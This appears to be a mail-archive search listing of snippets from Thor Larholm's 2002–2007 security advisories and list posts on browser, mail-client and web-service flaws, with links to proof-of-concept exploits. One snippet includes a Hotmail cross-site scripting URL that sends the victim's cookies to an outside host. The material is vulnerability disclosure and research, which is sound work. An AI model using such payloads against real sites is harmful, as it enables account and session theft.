upgrade to Thunderbird 2.0.
http://larholm.com/2007/07/26/thunderbird-15-has-not-been-patched-with-osint/
Regards
Thor Larholm
Thor Larholm wrote:
The Mozilla application platform currently has an unpatched input
validation flaw which allows you to specify arbitrary command line
arguments to any regi
A ZIP file with the report and the XPI exploits can be found at
http://larholm.com/media/2007/7/mozillaprotocolabuse.zip
Cheers
Thor Larholm
handler. The
full advisory and a working Proof of Concept exploit can be found at
http://larholm.com/2007/07/10/internet-explorer-0day-exploit/
Cheers
Thor Larholm
interaction simply by visiting a webpage. The full advisory and a
working Proof of Concept exploit can be found at
http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/
Cheers
Thor Larholm
--
I call dibs on the first SafariWin bug
-execution/
Cheers
Thor Larholm
is that you can still read some local files on Windows
and all user accessible files on Linux/Unix/OS X, with all user
accessible files potentially readable as well on Windows through the
patch regression.
http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/
Cheers
Thor
ot;.
The updated version of Firebug should also prevent any closely related
vulnerabilities as Joe has updated his domplate constructors to
forcefully escape all strings before they are inserted into the
console HTML.
Cheers
Thor Larholm
On 4/4/07, pdp (architect) <[EMAIL PROTECTED]> wr
blogs.securiteam.com/index.php/archives/657
--
Thor Larholm
and thus
allows you to overwrite native DOM methods on a thirdparty domain,
broadening the potential attack scope by allowing you to interfere with
the operations of existing script code inside that thirdparty document.
--
Thor Larholm
PolyPath, CSO
which covers the broader picture. I
guess the cat is out of the bag now, might as well release that soon ;)
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
-Original Message-
From: Richard M. Smith [mailto:[EMAIL PROTECTED]
Sent: Monday, August 04, 2003 11:58
crashing svchost. Of course,
this is only with the new return addresses that are not tied to any
specific servicepack..
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
-Original Message-
From: khan rohail [mailto:[EMAIL PROTECTED]
Sent: Monday, July 28, 2003 8:34 AM
, both on a
webpage and in an email - even with scripting disabled in the Restricted
Zone, which has so far been a major mitigating factor. This means that an
emailborne exploit would execute immediately when a user opened or previewed
an HTML-based email.
Regards
Thor Larholm
PivX Solutions, LLC
Thor Larholm security advisory TL#006
-
16 July 2003
HTML format: http://pivx.com/larholm/adv/TL006
Topic: ISA Server HTTP error handler XSS.
Discovery date: 25 June 2002.
Severity: Medium
Affected applications:
--
Any Microsoft
e web in the Internet Zone, so this is remotely exploitable on websites.
Since MHT files are opened automatically, just like certain other media
files, you can also open an MHT file automatically through an email message
in the Restricted Zone.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Internet Zone for viewing HTML mail? If so, it is
also still vulnerable to the codeBase command execution vulnerability, like
any other application that is embedding MSHTML.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine
Since RTF files are opened and rendered automatically by Outlook Express and
Internet Explorer, this is remotely exploitable through mail and web.
I had some problems reproducing this on Windows 2000, anyone had better
luck?
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
dor
that at best is plainly ignorant and at worst acts directly against the best
interest and security of its own customers.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine Advisory
http://www.pivx.com/press_releases/ueng-adv_pr.html
bed it their own and wrote up a fancy press release filled with
inaccuracies announcing a indifferent 'whitepaper' scathered with obscure
irrelevancies.
In short, snakeoil.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-vendor Game
urrently 18 unpatched publicly known vulnerabilities in Internet
Explorer, of which I have labelled 6 as severe.
http://www.pivx.com/larholm/unpatched/
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Strike Now, StrikeFirst!
http://www.pivx.com/sf.html
This is just a copy of Andreas Sandblads advisory, with a new command :)
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Strike Now, StrikeFirst!
http://www.pivx.com/sf.html
-Original Message-
From: Alan Rouse [mailto:[EMAIL PROTECTED]]
Sent: 11. november 2002 17:22
To
Monitoring which pages a user visits is also possible, and in general there
seems to be some oversights in this otherwise smooth rewrite.
Add to that some of the more odd bugs functionalitywise, and I would say
there is room for a beta 2 ;)
Regards
Thor Larholm, Security Researcher
PivX
comes up with next to prevent interaction
between security zones.
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
-Original Message-
From: Andreas Sandblad [mailto:sandblad@;acc.umu.se]
Sent: 6. november 2002 20:48
To: [EMAIL PROTECTED
each individual method and object. At first, I assumed
they had made a generic fix, but with this in the open it is clear that they
only patched specifics and that there will be many more vulnerabilities in
the method/object caching category.
Regards
Thor Larholm
This is not a vulnerability or even privacy exposure in MSN, but just a
demonstration of zone spoofing by using the %2F encoding bug.
All the exposed MSN contact list and information is intentionally, and
safely, exposed in the My Computer zone.
Regards
Thor Larholm, Security Researcher
PivX
Thor Larholm security advisory TL#004
Topic: Windows Help buffer overflow
HTML version:
http://www.pivx.com/larholm/adv/TL004/
Discovery date: 31 July 2002
Release date: 4 October 2002
Affected applications
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows
/ alerts "hi monkeyboy"
The first argument can be both a string or a regular expression.
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>location.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.repl
ace('$',document.cookie));&ct=1033054530&_setlang=",,-1,0
Regards
Thor Larholm
Jubii A/S - Internet Programmer
bitrary scripting to be executed by the
user in the context of hotmail. This means that you can e.g. steal his
cookies or, if he's logged in, write emails from his account, delete his
mails and change his password.
Regards
Thor Larholm
Jubii A/S - Internet Programmer
This also works in IE5.5 as well.
Besides reading cookies from arbitrary sites, this vulnerability also allows
local file reading and execution - when combined with the OBJECT
crossprotocol redirection vulnerability.
http://jscript.dk/2002/10/sec/SaveRefLocalFile.html
Regards
Thor Larholm
rity issues that were fixed between
the minor version change 1.0 to 1.0.1, I have no idea about the amount of
issues that remain or that has been fixed so far.
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
> From: Nick FitzGerald [mailto:[EMAIL PROTECTED]]
> Hi Thor,
> Doesn't the following have similar implications to the issue in your
> TL#002 advisory??
Hi Nick,
close but no cigar - yet. In its current state, this % encoding issue cannot
escape protocol boundaries, which means that it cannot g
ed when used again - in which case you are out of
luck.
If your vulnerability did not deal with OWC, then apologize my intrusion and
let me guess on a Content-Type/Content-Disposition variant - though your
suggested workaround would make no sense then :)
Regards
Thor Larholm, Security Researcher
P
or has explicitly allowed HTTP traffic on
(most often) port 80.
Out of plain curiosity, how is this fixed in IE6SP1 - as the Netscape team
fixed it by demanding both sites to set document.domain, regardless if one
is the parent?
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
> Title: Pressing CTRL in IE is dangerous
Of course, this also works with key combinations such as Shift+Ins, just
change event.ctrlKey to event.shiftKey and 86 to 45 :)
20 and counting ...
http://www.pivx.com/larholm/unpatched/
Regards
Thor Larholm, Security Researcher
PivX Soluti
Thor Larholm, PivX, security advisory TL#003
-
By Thor Larholm, Denmark
10 July 2002
HTML format: http://www.PivX.com/larholm/adv/TL003/
Topic: IE allows universal Cross Domain Scripting.
Discovery date: 25 June 2002.
Severity: High
Affected applications
it quite
easy to e.g. execute arbitrary commands, undoubtedly a more fun
demonstration:
http://jscript.dk/Jumper/xploit/ftpfolderview.html
Status: 18 unpatched vulnerabilities.
http://jscript.dk/Unpatched/
Regards
Thor Larholm
Jubii A/S - Internet Programmer
to be the only one who has discovered this fact. GreyMagic
Software have updated their advisory on the cssText vulnerability and
bundled a new example that works "post MS02-023", which can be found at
http://sec.greymagic.com/adv/gm004-ie/
Regards
Thor Larholm
Jubii A/S - Internet Programmer
inute since the email itself would act as the hosting server.
Yesterday I hosted a list of 14 publickly known unpatched vulnerabilities,
today I host a list of 12 such. It can still be found at
http://jscript.dk/unpatched/
Just my .02 kroner of comments :)
Regards
Thor Larholm
Jubii A/S - Internet Programmer
f-concept demonstration that also works in moz1rc1 can be found at
http://jscript.dk/2002/4/NS6Tests/documentload.html
Regards
Thor Larholm
Jubii A/S - Internet Programmer
files exist.
http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp
Regards
Thor Larholm
Jubii A/S - Internet Programmer
-Original Message-
From: GreyMagic Software [mailto:[EMAIL PROTECTED]]
Sent: 30. april 2002 03:11
To: NTBugtraq; Bugtraq
Subject: Reading local files in Netscape
Thor Larholm security advisory TL#002
-
By Thor Larholm, Denmark.
16 April 2002
HTML Format: http://jscript.dk/adv/TL002/
Topic: IE allows universal Cross Site Scripting.
Discovery date: 18 March 2002.
Severity: High
Affected applications
Thor Larholm security advisory TL#001
-
By Thor Larholm, Denmark.
10 April 2002
HTML format: http://jscript.dk/adv/TL001/
Topic: IIS allows universal CrossSiteScripting.
Discovery date: 13 March 2002.
Severity: Medium
Affected applications
Further, the patch doesn't seem to work completely:
http://www.theregister.co.uk/content/4/24667.html
Though, in other cases, it works better than expected:
http://jscript.dk/unpatched/N280302-01.html
A revision of the patch may be in place.
Regards
Thor Larholm
Jubii A/S - Int
ered to be a code quality bug, and will be adressed in a future SP
for IE.
--
Thor Larholm
43 matches
Mail list logo